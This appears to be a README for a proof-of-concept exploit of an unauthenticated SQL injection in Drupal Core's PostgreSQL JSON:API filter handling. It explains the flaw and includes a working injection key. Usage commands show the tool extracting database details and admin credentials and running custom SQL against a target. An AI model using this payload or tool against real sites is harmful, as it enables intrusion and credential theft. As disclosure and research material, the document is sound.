## https://sploitus.com/exploit?id=89259320-7066-518A-B075-CE8CD77E926F
CVE-2026-9082 โ Drupal Core PostgreSQL SQL Injection PoC
๐ Overview
This repository provides an ethical Proof-of-Concept (PoC) for
CVE-2026-9082, a Highly Critical SQL injection
vulnerability in Drupal Core affecting all PostgreSQL-backed
sites running Drupal 8.0 through 11.3.9.
The flaw resides in the PostgreSQL Entity Query Condition handler and can be
exploited by anonymous (unauthenticated) users through the
JSON:API module, which is enabled by default since Drupal 9.
Official advisory:
SA-CORE-2026-004
โ ๏ธ Vulnerability Summary
Drupal Core includes a database abstraction API designed to sanitize queries
and prevent SQL injection. A flaw in the PostgreSQL-specific Entity Query
Condition class (core/modules/pgsql/src/EntityQuery/Condition.php)
allows an attacker to inject arbitrary SQL through user-controlled
array keys passed via JSON:API filter parameters.
CVE ID: CVE-2026-9082
Advisory: SA-CORE-2026-004
Affected Software: Drupal Core
Affected Versions: 8.0.0 โ 11.3.9 (PostgreSQL backend only)
Fixed in: 11.3.10, 11.2.12, 10.6.9, 10.5.10
Severity: Highly Critical โ 20/25 on Drupal risk scale
Authentication: None required (anonymous)
Impact: Data exfiltration, privilege escalation, RCE in some configurations
Attack vector: HTTP โ JSON:API filter condition array keys
How it works
The translateCondition() method in the PostgreSQL Condition
class iterates over $condition['value'] and uses the
array keys to construct PDO placeholder names:
$where_id = $where_prefix . $key;
JSON:API allows anonymous users to supply filter values with
arbitrary array keys via URL parameters:
filter[x][condition][value][MALICIOUS_KEY]=val
PDO named placeholders only consist of [a-zA-Z0-9_]
characters. When the key contains ), PDO stops parsing the
placeholder name โ everything after becomes literal SQL
injected into the query.
By sending a key like 1))/**/OR/**/(SELECT pg_sleep(5)) IS NOT NULL)--,
the attacker closes the IN() clause and appends arbitrary SQL,
while the binding for :prefix_1 is satisfied by a legitimate
key 1 in the same request.
๐ References & Credit
Advisory: SA-CORE-2026-004
Patch commit: ea9524d9
Discoverer: michaelmaturi (credited in the advisory)
โ๏ธ Legal Notice
This tool is intended for authorized security testing, educational
purposes, and ethical research only. Unauthorized access to computer systems
is illegal.
๐ Installation
git clone https://github.com/7h30th3r0n3/CVE-2026-9082-Drupal-PoC.git
cd CVE-2026-9082-Drupal-PoC
pip install requests rich
โก Usage (CLI)
# Check if target is vulnerable
python3 CVE-2026-9082.py -u https://target.com --check
# Extract PostgreSQL version
python3 CVE-2026-9082.py -u https://target.com --version
# Extract database info (user + db name)
python3 CVE-2026-9082.py -u https://target.com --dbinfo
# Extract Drupal admin credentials (uid=1)
python3 CVE-2026-9082.py -u https://target.com --admin
# List database tables
python3 CVE-2026-9082.py -u https://target.com --tables
# Custom SQL query extraction
python3 CVE-2026-9082.py -u https://target.com --query "SELECT current_user"
# Use boolean-based extraction (faster but less reliable)
python3 CVE-2026-9082.py -u https://target.com --version -m bool
# Interactive mode (no arguments)
python3 CVE-2026-9082.py
๐ Author
PoC developed by 7h30th3r0n3
Vulnerability discovered by michaelmaturi